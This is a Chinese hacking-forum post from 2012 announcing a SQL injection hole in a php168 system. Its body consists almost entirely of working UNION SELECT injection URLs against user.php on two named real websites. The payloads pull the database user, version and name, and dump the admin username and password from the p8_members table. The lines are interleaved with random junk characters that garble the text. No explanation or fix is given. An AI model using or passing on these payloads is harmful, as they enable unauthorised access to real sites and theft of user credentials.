找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2810|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--8 U% s0 D' @1 U  D
                                                         
4 a! i* S& T* o' d2 Y                                       9 Y8 _2 \5 H/ O7 {
' d& s( C: d" I
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--) M* s) \/ t/ N1 u: `. F% v- G2 g
                                                     
" _4 M% A# j) }9 `                                                                  
3 E: O* n( {) r; l                                                        ; `/ `# E. O3 ^% P' g. z  c' Q
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--* A0 X# W$ _. X; X$ m

) M' u9 I* ^8 Z3 A$ \7 \' {3 j* }, t+ C/ U+ C5 k( H

$ u8 u5 V" Y8 S, r9 I                                                            / u$ @* n8 x; `: n; T3 q. c

! Q5 `+ ]0 d8 Thttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
  d1 c7 ^& g% g) x% v: c! r
& t1 K1 v* L; {' K( s! H
- z9 |$ B& ?" u2 m" F/ A9 T3 i  i
6 y& o) S2 s, ]                                                                    
. i1 t2 V& k) [( ^/ r  d9 `

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表